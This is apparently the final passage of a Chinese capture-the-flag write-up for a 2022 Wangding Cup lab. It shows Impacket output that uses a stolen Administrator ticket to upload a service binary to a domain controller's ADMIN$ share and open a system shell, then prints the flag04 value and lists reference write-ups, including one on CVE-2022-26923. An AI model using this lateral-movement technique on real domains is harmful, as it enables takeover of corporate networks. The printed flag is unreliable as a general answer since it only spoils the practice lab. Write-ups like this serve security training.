[*] Saving ticket in Administrator.ccache
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Requesting shares on XR-DC01.xiaorang.lab.....
[*] Found writable share ADMIN$
[*] Uploading file szppiQYo.exe
[*] Opening SVCManager on XR-DC01.xiaorang.lab.....
[*] Creating service gZxj on XR-DC01.xiaorang.lab.....
[*] Starting service gZxj.....
[!] Press help for extra shell commands
Microsoft Windows [版本 10.0.14393]
(c) 2016 Microsoft Corporation。保留所有权利。
C:\windows\system32>得到flag
C:\Users\Administrator\flag> type flag04.txt
:::===== ::: :::==== :::===== :::==== ::: ===
::: ::: ::: === ::: ::: === ::: ===
====== === ======== === ===== === === ========
=== === === === === === === === ===
=== ======== === === ======= ====== ===
flag04: flag{d1fcc7fb-4736-4a7e-9693-0de3be345efe}参考
远程连接服务器时出现“这可能是由于CredSSP加密数据库修正”的错误提示的解决办法-CSDN博客
春秋云镜 2022网鼎杯半决赛 WP - BattleofZhongDinghe - 博客园 (cnblogs.com)
春秋云境2022网鼎杯半决赛-WP【一遍过】_2022网鼎杯半决赛wp-CSDN博客
2022网鼎杯半决赛复盘 (gkjzjh146.github.io)
2022网鼎杯半决赛复盘 - 春秋云境 | h0ny’s blog
春秋云镜-2022网鼎杯半决赛复盘-Writeup_第三届网鼎杯 半决赛 wp-CSDN博客
Active Directory 域服务特权提升漏洞 CVE-2022–26923-腾讯云开发者社区-腾讯云 (tencent.com)
